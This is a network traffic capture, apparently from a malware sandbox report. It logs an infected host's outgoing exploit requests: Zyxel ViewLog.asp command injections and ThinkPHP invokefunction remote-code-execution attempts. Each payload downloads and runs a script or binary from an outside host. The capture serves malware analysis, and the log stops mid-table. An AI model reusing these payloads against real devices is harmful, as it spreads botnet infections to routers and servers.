Nov 22, 2023 08:38:10.469619036 CET	2535	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:11.056992054 CET	2567	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:12.240843058 CET	2695	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.800484896 CET	3032	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:19.663816929 CET	3570	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:29.134464025 CET	4731	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:49.099641085 CET	7113	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.006217003 CET	11908	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.23	50014	31.136.108.70	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:10.469692945 CET	2536	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:11.056982994 CET	2566	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:12.240847111 CET	2695	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.800472021 CET	3032	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:19.663815975 CET	3570	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:29.134464979 CET	4732	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:49.099644899 CET	7113	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.006248951 CET	11908	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.23	52702	94.46.170.20	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:10.477471113 CET	2537	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:10.671184063 CET	2551	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:10 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.23	38128	31.44.133.127	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:10.512902021 CET	2539	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.23	60970	94.120.4.153	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:10.736102104 CET	2563	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.23	33880	95.86.68.170	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:10.754837990 CET	2564	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.23	37140	112.125.171.176	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:11.377537012 CET	2587	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:11.691646099 CET	2625	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:58 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.23	59976	112.126.230.31	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:11.393985033 CET	2588	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:13.040735960 CET	2804	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:13.361974955 CET	2843	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:36 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.23	44266	112.74.95.130	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:11.398847103 CET	2611	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:11.724900961 CET	2626	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.1 Date: Wed, 22 Nov 2023 07:26:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.23	33658	112.74.177.77	80

Timestamp	kBytes transferred	Direction	Data
